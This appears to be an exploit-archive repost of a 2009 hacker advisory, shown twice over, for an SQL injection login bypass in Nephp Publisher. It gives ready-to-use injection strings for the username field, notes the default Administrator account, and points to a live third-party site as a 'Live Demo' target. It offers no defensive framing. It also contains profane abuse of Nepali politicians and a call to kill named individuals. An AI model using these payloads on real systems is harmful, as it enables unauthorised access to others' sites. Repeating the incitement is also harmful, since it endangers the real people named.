ExploitFixes
Nephp Publisher Enterprise 4.5 (Auth Bypass) SQL Injection Vulnerability 2009-09-17 22:05:02
#############################################
# NEPHP publisher SQLi login bypass #
# By learn3r hacker from Nepal #
# damagicalhacker@gmail.com #
#############################################
Affected version: v 3.5.9 or may be lower...
Username: valid_username'# [eg. Administrator/*]
Password: learn3r [or whatever]
Or
Username: ' or 1='1'#
password: learn3r [or whatever]
Live Demo: http://andhracafe.com/admin/index.php
Note that Administrator is a default username in this product
Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar
By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!
#
#############################################
# NEPHP publisher SQLi login bypass #
# By learn3r hacker from Nepal #
# damagicalhacker@gmail.com #
#############################################
Affected version: v 3.5.9 or may be lower...
Username: valid_username'# [eg. Administrator/*]
Password: learn3r [or whatever]
Or
Username: ' or 1='1'#
password: learn3r [or whatever]
Live Demo: http://andhracafe.com/admin/index.php
Note that Administrator is a default username in this product
Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Parmananda Jha, Upendra Yadav and Vijay Gachhedhaar
By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!
#